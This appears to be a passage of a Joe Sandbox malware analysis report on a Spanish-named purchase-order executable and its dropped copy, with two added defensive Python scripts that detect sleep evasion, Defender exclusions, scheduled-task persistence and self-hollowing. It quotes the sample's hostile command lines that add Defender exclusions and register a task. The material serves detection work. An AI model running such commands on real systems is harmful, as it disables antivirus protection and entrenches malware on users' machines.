                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99108s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -96969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99076s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98749s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98527s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98273s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -98046s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97608s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -97500s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 100000
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99890
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99781
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99671
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99562
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99453
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99342
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99234
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99125
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99015
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98902
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98796
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98686
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98578
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98468
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98359
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98250
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98140
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98031
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97921
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97812
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97702
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97593
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97484
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97375
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97265
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97156
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 97046
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96937
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96828
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96718
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96609
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96500
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96390
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96281
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96171
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 96062
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 95953
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99968
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99854
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99749
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99640
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99531
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99421
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99312
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99203
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 99093
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98984
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98875
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Thread delayed, delay times in the order reported: 922337203685477 (two entries), then 100000, 99875, 99765, 99656, 99547, 99437, 99328, 99219, 99108, 99000, 98891, 98781, 98672, 98563, 98438, 98313, 98203, 98094, 97969, 97859, 97750, 97641, 97531, 97422, 97312, 97203, 97094, 96969; then a second run: 99968, 99859, 99750, 99640, 99531, 99422, 99312, 99203, 99076, 98968, 98859, 98749, 98640, 98527, 98273, 98156, 98046, 97937, 97828, 97718, 97608, 97500
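The descending runs above (100000 down to 96969, then 99968 down to 97500 for nNdsLvHyWi.exe, with the same shape for nOrden_de_compra.exe) step down by roughly 110 each time. That is what a loop that sleeps for the time remaining until a deadline looks like when the sandbox returns from each sleep early and the sample re-reads the wall clock before sleeping again: every value is the remaining wait, and the difference between neighbours is the real time that passed. The value 922337203685477 equals TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks divided by 10000, truncated), which is consistent with the whole list being in milliseconds. The Python below is an added example and not part of the Joe Sandbox report; it classifies a delay sequence into those two patterns and reports how much wall-clock time the sample actually observed against what it asked for. SAMPLE_DELAYS is copied from the nNdsLvHyWi.exe entries above as constructed input, and the finding field names are this example's own.

```python
"""Classify the 'Thread delayed' sequences a sandbox reports for a sample.

Added example; it is not part of the Joe Sandbox report. SAMPLE_DELAYS is
constructed from the nNdsLvHyWi.exe entries in the report; the finding
field names are this script's own.
"""
from statistics import median

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10000, truncated.
# The report's 922337203685477 is exactly this value.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

SAMPLE_DELAYS = [922337203685477, 922337203685477,
                 100000, 99875, 99765, 99656, 99547, 99437, 99328, 99219, 99108, 99000]


def split_runs(delays, max_step):
    """Split delays into runs of strictly decreasing values with step <= max_step.

    Delays are recorded in the order the sample requested them. A long run of
    decreasing values with a small, near-constant step is the signature of a
    'sleep until the deadline' loop whose every sleep returns early (sandbox
    sleep skipping) while the sample keeps re-reading the wall clock.
    """
    if not delays:
        return []
    runs, current = [], [delays[0]]
    for prev, cur in zip(delays, delays[1:]):
        if 0 < prev - cur <= max_step:
            current.append(cur)
        else:
            runs.append(current)
            current = [cur]
    runs.append(current)
    return runs


def classify(delays, max_step=500, min_run=5):
    """Return findings: TimeSpan.MaxValue sleeps and countdown loops."""
    findings = []
    huge = [d for d in delays if d >= TIMESPAN_MAX_MS]
    if huge:
        findings.append({"kind": "max_timespan_sleep", "count": len(huge)})
    for run in split_runs(delays, max_step):
        if len(run) < min_run:
            continue
        steps = [a - b for a, b in zip(run, run[1:])]
        findings.append({
            "kind": "countdown_loop",
            "intended_wait_ms": run[0],                 # the full wait the sample wanted
            "observed_elapsed_ms": run[0] - run[-1],    # wall-clock time it actually saw
            "iterations": len(run),
            "median_step_ms": median(steps),            # about 110 ms per skipped sleep in the report
        })
    return findings


if __name__ == "__main__":
    for finding in classify(SAMPLE_DELAYS):
        print(finding)
```

Read against the full nNdsLvHyWi.exe list, the first run asks for 100 s and observes about 3 s before the sample gives up and restarts the wait, which is the evasion the "Contains long sleeps" signature is summarising.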
Source: nOrden_de_compra.exe, 00000000.00000002.2116285224.0000000006F20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nNdsLvHyWi.exe, 0000000B.00000002.2145604750.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} (device-interface path of VMware's virtual SATA CD-ROM, vendor string NECVMWar: a genuine VMware artifact)
Source: nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll= (the Winsock catalog name of the Hyper-V socket provider in mswsock.dll; it is present on ordinary Windows 10 installations, so on its own it is not evidence of running inside a VM)
Source: nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: page read and write, page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe")
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe")
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory written: C:\Users\user\Desktop\nOrden_de_compra.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory written: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\schtasks.exe (command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp")
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Users\user\Desktop\nOrden_de_compra.exe (command line: C:\Users\user\Desktop\nOrden_de_compra.exe)
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Users\user\Desktop\nOrden_de_compra.exe (command line: C:\Users\user\Desktop\nOrden_de_compra.exe)
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe (command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp")
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Process created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe (command line: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe)
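The entries above carry the three actions a defender would want to alert on: powershell.exe adding Windows Defender exclusions for files under the user's profile, schtasks.exe registering a task from an XML file in %TEMP%, and the sample starting a second copy of itself and then writing an MZ header at that copy's image base (the write step of RunPE-style hollowing, matching the "Memory written ... 4D5A" entries). The Python below is an added example and not part of the Joe Sandbox report or of any tool it names; it runs those three checks over events constructed by hand from the report's entries. The event fields (parent, image, cmdline, source, target, base, head) are this example's own rather than a Joe Sandbox export format, and the command lines are copied as the sandbox captured them (outer quotes missing), which the regexes tolerate.

```python
"""Triage rules for the evasion and persistence entries in the report.

Added example; it is not part of the Joe Sandbox report or of any tool it
names. EVENTS is constructed by hand from the report's process-creation and
memory-write entries; the field names are this script's own.
"""
import re

# Defender exclusion added or replaced from the command line (Add-/Set-MpPreference).
EXCLUSION = re.compile(
    r'(add|set)-mppreference.*?-exclusion(path|process|extension)\s+"?([^"]+?)"?(?=\s+-|\s*$)', re.I)
# schtasks /Create that takes its task definition from an XML file.
SCHTASK_XML = re.compile(r'schtasks(\.exe)?"?\s.*?/create\b.*?/xml\s+"?([^"]+?)"?(?=\s+/|\s*$)', re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^"]+?)"?(?=\s+/|\s*$)', re.I)
# Locations an unprivileged user can write to; an exclusion there shields the malware's own files.
USER_WRITABLE = re.compile(r'^[a-z]:\\(users|programdata)\\|\\(appdata|temp)\\', re.I)
TEMP_DIR = re.compile(r'\\temp\\', re.I)

# Constructed from the report's entries (quoting as the sandbox captured it).
EVENTS = [
    {"type": "process_create",
     "parent": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe'},
    {"type": "process_create",
     "parent": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp'},
    {"type": "process_create",
     "parent": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "image": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "cmdline": r"C:\Users\user\Desktop\nOrden_de_compra.exe"},
    {"type": "memory_write",
     "source": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "target": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
     "base": 0x400000, "head": b"MZ"},
]


def triage(events):
    """Apply the three rules and return a list of findings in event order."""
    findings, self_spawned, pe_written = [], set(), {}
    for ev in events:
        if ev["type"] == "process_create":
            cmd = ev["cmdline"]
            m = EXCLUSION.search(cmd)
            if m:
                for value in (v.strip() for v in m.group(3).split(",")):
                    findings.append({"rule": "defender_exclusion", "kind": m.group(2).lower(),
                                     "value": value,
                                     "user_writable": bool(USER_WRITABLE.search(value)),
                                     "parent": ev["parent"]})
            m = SCHTASK_XML.search(cmd)
            if m:
                xml, name = m.group(2), TASK_NAME.search(cmd)
                findings.append({"rule": "schtask_from_temp" if TEMP_DIR.search(xml) else "schtask_from_xml",
                                 "task": name.group(1) if name else None,
                                 "xml": xml, "parent": ev["parent"]})
            if ev["parent"].lower() == ev["image"].lower():
                self_spawned.add(ev["image"].lower())   # a process launching its own image
        elif ev["type"] == "memory_write":
            # A PE header written into a process running the writer's own image is the
            # write step of hollowing a suspended child; alone it is only a candidate.
            if ev["head"][:2] == b"MZ" and ev["source"].lower() == ev["target"].lower():
                pe_written[ev["target"].lower()] = ev["base"]
    for image in sorted(self_spawned & pe_written.keys()):
        findings.append({"rule": "self_hollowing_candidate", "image": image,
                         "base": hex(pe_written[image])})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

In practice the events come from Sysmon process-creation and process-access telemetry or an EDR feed; on a suspect host the first rule is complemented by reading the current exclusion list with `Get-MpPreference` (its ExclusionPath property) and treating any entry under C:\Users or %TEMP% as hostile until explained.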
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Queries volume information for:
  C:\Users\user\Desktop\nOrden_de_compra.exe
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
  C:\Windows\Fonts\micross.ttf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information for the following paths (some of them repeatedly; the list is reported twice):
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
  C:\
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Queries volume information for:
  C:\Users\user\Desktop\nOrden_de_compra.exe
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Queries volume information for:
  C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
